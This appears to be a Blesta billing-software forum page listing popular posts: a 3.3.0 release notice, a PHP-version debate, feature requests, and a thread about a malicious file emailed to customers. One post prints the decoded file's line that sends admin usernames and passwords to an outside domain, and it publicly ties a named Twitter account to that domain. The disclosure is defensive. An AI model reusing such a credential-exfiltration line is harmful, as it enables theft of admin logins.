Leaderboard

Popular Content

Showing content with the highest reputation on 09/25/2014 in all areas

  1. Thanks for decoding! Could someone send me the decrypted file? At the moment I think I'm the only client who received this e-mail. I think it's a targeted attack on our company. We will pass the information to the German police.
    4 points
  2. Think of it this way: 1º- Who uses a sophisticated automated billing system like Blesta? Re: IT managers, hosting companies, datacenters. 2º- Who the hell in point 1º doesn't want to use a stable, up-to-date PHP and/or MySQL version, even if they don't use CloudLinux, Interworx or other? Re: No one; only non-professional businesses or kiddies that don't know how to really manage a hosting business want that. There is no reason that you can tell me to convince me to use an outdated PHP and/or MySQL version. We do professional business, don't you? Everything is insecure, I repeat, everything, even the latest PHP 5.6 or latest MySQL, but if you use the A person that buys Blesta is a person concerned with client data, so they have to use security to prevent future problems. I'm not telling you this to get me wrong, just to make a point
    3 points
  3. The Refunded status will be in v3.4
    3 points
  4. mrrsm

    Shared Login Plugin

    To me it doesn't make sense for my billing software to be writing software for other CMSs. I would rather have them focus on what they are supposed to be doing, billing. The Blesta API gives you almost complete access to do whatever you need to do in order to interact with Blesta. Now I can make sure everything is secure, as in theory, I will know my CMS of choice better than the Blesta team so I can properly secure my plugin and make sure it is 100% compatible with any oddities I may have in my system. I would rather have someone who knows my system well than just putting a bunch of plugins together and hoping for the best. I'm not sure what type of integration plugin you are looking for. It sounds like you want a plugin that adds the login hook for you? What do you consider "popular CMSs"? There are a ton out there. I would guess WordPress, Drupal, and Joomla, but really that list can go on.
    3 points
  5. Yeah, PauloV decoded it. I debated not posting this information but here's where the file sends your admin details: https://my.dorob.de/modules/addons/passwords/insert.php?url=" . $url . "&user=" . $u . "&pw=" . $p Domain is registered to: IP address is 37.228.135.135 which belongs to: This person also has the twitter account https://twitter.com/dorobde and was critical of Blesta in this tweet: https://twitter.com/DoRobDE/status/507934296829861888
    3 points
  6. Anyone send you the decoded file? The ISP is telling me they are aware of the police investigation. I'm curious how it turns out, and wish you the best of luck.
    2 points
  7. We sent a notice to the ISP
    2 points
  8. Looks promising, can't load the site.
    2 points
  9. Hi, I just get the message back that server and ip were locked.
    2 points
  10. The thing is this wannabe hacker forgot that if someone decoded it, his domain would be there, which then linked to the stupid tweet we know about and then linked to a visible who.is, and a team page which we could google their name...
    2 points
  11. Paul

    Release 3.3.0

    I am looking into the issue right now.
    2 points
  12. According to here: http://docs.blesta.com/display/user/Requirements Blesta supports PHP versions as low as 5.1.3. Looking at the end of life (EOL) of PHP's releases (http://php.net/eol.php), which means absolutely no support anymore except for MAYBE security releases, here's how it breaks up: PHP 5.1 EOL: August 24, 2006; PHP 5.2 EOL: January 6, 2011; PHP 5.3 EOL: August 14, 2014. Now there's some points here: Blesta doesn't take advantage of some of the nicer features of PHP 5.3+, namely namespaces (release notes on 5.3: http://php.net/releases/5_3_0.php). The fact that Blesta supports such outdated versions of PHP leaves itself open to some vulnerabilities due to also having to use old/outdated scripts that still support legacy versions as well. 5.3's EOL just happened, and it has been stated by the PHP team that they are only focused on security updates for it now, and 5.4 is not far behind. 5.6 just came out, with talks already of either a 5.7 or finally releasing PHP 7 within the next year or two. There's also the problem that now Blesta has to provide ionCube-encoded files for not only pre-5.5 but also 5.5 and potentially newer versions. I.e.: I develop with 5.5, and want to upgrade to 5.6 but can't due to this. From a developer standpoint, using more current versions of PHP provides a lot more opportunities to developers (i.e.: namespaces are amazing for a community-driven project like Blesta gives the vibe of). Granted, compared to WHMCS it already is in a lot of ways, but I feel this is holding Blesta back more than anything. If hosts are using such archaic versions of PHP to begin with then there's more issues than Blesta can deal with. I simply propose supporting the feature set of 5.3 and higher (at least 5.3), as supporting something that was discontinued 8 years ago to this day does make development for it more difficult than it should.
    1 point
  13. Cody

    Release 3.3.0

    Version 3.3.0 is now available. You can download it in the Client Area. If you have an owned branded or owned unbranded license purchased more than one year ago, be sure you have Support and Updates for your license before attempting to upgrade. To purchase support and updates: Log into the client area and click the "Manage" link next to your license, then click "Addons", and select Support and Updates from the drop down menu, and continue to purchase. Installing Blesta: See Installing Blesta in the User Manual for instructions. Upgrading Blesta: See Upgrading Blesta in the User Manual for instructions. Migrating to Blesta: See Migrating to Blesta in the User Manual for instructions. Overview: Pro forma invoices; Pro rata; Price overrides; Modules: Added Multicraft; Plugins: Update Order plugin to include new order forms templates; Tons more... PHP 5.5+ Users: Included in this release is a /hotfix-php5.5/ directory. Please use this directory to overwrite the default /blesta/app/app_controller.php, /blesta/app/app_model.php, and /blesta/app/models/license.php files. Release Notes: See Blesta Core - Version 3.3.0-b1. See Blesta Core - Version 3.3.0-b2. See Blesta Core - Version 3.3.0. For older releases see all Change Logs.
    1 point
  14. It's not always feasible to have universal package names, so it would be great if Blesta could let us type the name in all the installed languages, just like for the descriptions
    1 point
  15. When you install a language you get a tab for the Welcome email (and emails) however no language box for the descriptions... Please come with the 3.4 when the language changer comes *cough*
    1 point
  16. Paul

    Support Newer Php Versions

    Everyone *should* keep their software updated and a lot of hosting companies do make the effort. Still, there are many smaller hosting companies that don't. Much of the market consists of smaller hosting providers that have reseller accounts from larger hosting providers. Fortunately, the majority of them are now running PHP 5.3+, hence the pending minimum requirements bump.
    1 point
  17. That's exactly PHP's problem (and Microsoft's too )
    1 point
  18. Definitions for v3.3.0 have been added to the Translator.
    1 point
  19. What's the difference between MySQL and PHP? They both are languages which can be insecure at any time, and you can if you use CloudLinux PHP Selector but hey I don't
    1 point
  20. 1 out of thousands, the thing is not everyone wants to upgrade, I've upgraded MySQL & InnoDB default (Should be stabler) before and had too many issues than I can think of. So I wouldn't use that if it was the last on earth until I was sure and 10000% sure it was fine.
    1 point
  21. ModulesBakery

    Egad!

    Yeah I am working on it currently, provisioning and admin area management for each service (droplet) is done, and starting from tomorrow will start on the client side droplet management.
    1 point
  22. Why don't you put the translation editor code to github and let the community help out. This way you can concentrate on the core of Blesta and we can worry about the translation editor.
    1 point
  23. We don't want to delete data that can have adverse effects on other areas of the system, so we prevent its deletion, and it should be marked inactive instead. We may revisit this in the future to allow packages to be deleted if we can avoid the data loss for attached services in an acceptable manner. As for finding the services, you should be able to use the Smart or Service search in the admin interface to search by the package name in order to receive a list of services, or clients that use that service, respectively.
    1 point
  24. Currently, when defining a dropdown, it's not possible to display the different elements in the dropdown using translated text, which means that unless we use brand names, people who don't understand English may not understand some of the custom fields they're presented with.
    1 point
  25. Stats on existing users don't necessarily correlate to potential customers, which is obviously the biggest concern when operating a business. To take an extreme look at it, we could make PHP 5.6 the minimum, and yes some people would be fine, others could upgrade, but we would receive almost 0 new business.
    1 point
  26. Do you have statistics for Blesta users? I assume you collect them via the license revalidation but if not then maybe you should. I suspect there would be a lot less Blesta servers running 5.2 or lower compared to other servers. Also a lot of the users on older PHP versions probably haven't upgraded just because their version was still supported. If you force them to upgrade I don't think many users would have problems.
    1 point
  27. Cody

    Support Newer Php Versions

    Regarding dropping support for PHP < 5.3. I have been for this since 3.0.0-a1 back in November 2012. The problem was at that time, more than 60% of all servers were still running 5.2 or lower. Today, sadly, there are still 25% of servers running PHP 5.2 or lower. Why have people been so slow to adopt PHP 5.3? Well, I suspect it has something to do with the fact that RHEL and CentOS are so incredibly slow to adopt new packages, coupled with the fact that most hosts don't keep servers up to date. In an ideal world, everyone would be running the latest version of PHP (5.6 today), but that's just not reality, and for us to shut off support for 5.2 and lower prematurely would hurt a lot of people. We always recommend installing Blesta using separation of concerns (1 server/VPS per role = minimum 3 servers/VPS [1 DB, 1 web, 1 mail]), but reality is there are tons of people that have Blesta installed in a shared environment. As Paul said, we'll be making 5.3 the minimum soon, as we now feel comfortable with the statistical usage of 5.3+.
    1 point
  28. Paul

    Release 3.3.0

    I may move some beta threads over before I close the forum. I'm in no hurry to close the forum right now as it's the typical post-release rush of tickets and am pretty busy. So... feature requests that have not been implemented, and bug fixes that have not been fixed?
    1 point
  29. Yeah, he is busted. What an idiot. We have too many experienced webmasters, coders, and admins here for a script kiddie to get away with much. An experienced spammer/hacker would not bother with such nonsense as this. They just want to send their spam. It looks like a deliberate attempt to make the Blesta company look bad. Here is an SPF generator if anyone needs it: http://www.spfwizard.net/ Microsoft makes one too: http://www.microsoft.com/mscorp/safety/content/technologies/senderid/wizard/
    1 point
  30. The -all will reject everything that does not pass. I like to use ~all because I can still get the flagged email. I simply set up a rule to have those flagged emails go to the flagged folder. Then I can scan through them for any mistaken failures (or someone who simply does not have the records set correctly) and also remember those that are frequent abusers. The frequent ones can be blocked on ACL or IP Tables. I guess whatever works is the answer as long as something is in place to prevent domain spoofing. This will stop many of the script kiddies and wannabe hackers, but a determined spammer will try other methods than spoofing to hijack an email server.
    1 point
  31. Blesta Addons

    Release 3.3.0

    Great news... What about the forums for 3.3, will they remain or will they be hidden? Please don't make them hidden, or move the threads to their respective forums in the community. Some threads have good information.
    1 point
  32. Correct. Nothing can stop someone from using domain.com@gmail.com, except for being observant. I know it does work if someone is trying to spoof the actual domain name. For example, the mail server would bounce an email from sales@blesta.com if: (1) the blesta zone file has an SPF record set and (2) the email is not originating from blesta's email server. Of course, nothing in life is 100% but I can say that using this has cut down on my domain being spoofed and on the amount of spoofed emails that I receive. If I had a company like Blesta I would probably use the "soft fail" [ "v=spf1 ~all" ] flag so I could still get the email but also be alerted that it may not be coming from the correct server. The hard fail option is good for individuals who do not want to get any spoofed mail at all.
    1 point
  33. Yeah, I think however that only works for fake @domain.com, not domain.com@gmail.com. We have DMARC, which again like SPF works at ensuring the IP is correct of the sender: v=DMARC1; p=quarantine; pct=50; adkim=strict; but it quarantines fakes, but only 50% of it (this is to ensure real emails don't get affected whilst the inboxes are learning).
    1 point
  34. Glad you didn't fall for it
    1 point
  35. Paul

    Release 3.3.0

    We found an issue where in some cases you wouldn't be able to upgrade with a trial license. This may or may not have affected some monthly licenses. @flangefrog wasn't affected by this.. what you have going on is something very different, and I suspect may be related to your server. The data sent from your server is missing important information, and I don't know why. I can't duplicate in my testing. My suggestion is to try to roll back to 3.2 for now. You should only have to restore your files, as your database has not been upgraded.
    1 point
  36. marcel

    Release 3.3.0

    Thank you guys..for this release..
    1 point
  37. Michael

    Release 3.3.0

    Lol still, I drifted off watching footie in the dark
    1 point
  38. astroroxy

    Release 3.3.0

    Just playing with you. I always forget you are from the UK.
    1 point
  39. Paul

    Release 3.3.0

    Open a ticket, you shouldn't get this with a monthly license at all.
    1 point
  40. It's been decoded mate.
    1 point
  41. 1 point
  42. It's like WHM** they and cPanel do a fix and release more information two weeks later so people don't get affected. What the idiot who sent it forgot was Blesta doesn't send emails and they announce what it sort of is and who found it if someone did outside the team.
    1 point
  43. Update: Here is the response from TeamGantt: "Thanks for writing in and letting us know about Blesta. It looks like a neat app. We currently only completed one integration at this point, but we hope to do more down the road. We’ll put this on our list of integrations to consider. I could see how it would be useful. Thanks again for your feedback." Looks like they're probably not going to do it any time soon, but it's great that now more people know about it!
    1 point
  44. Michael

    Generate Password

    Settings > Company > Custom Client Fields > Add > Custom Regex
    1 point
  45. Are you sleeping over the keyboard? So maybe you have touched some keys (DEL) + (CTRL+S) and job done
    1 point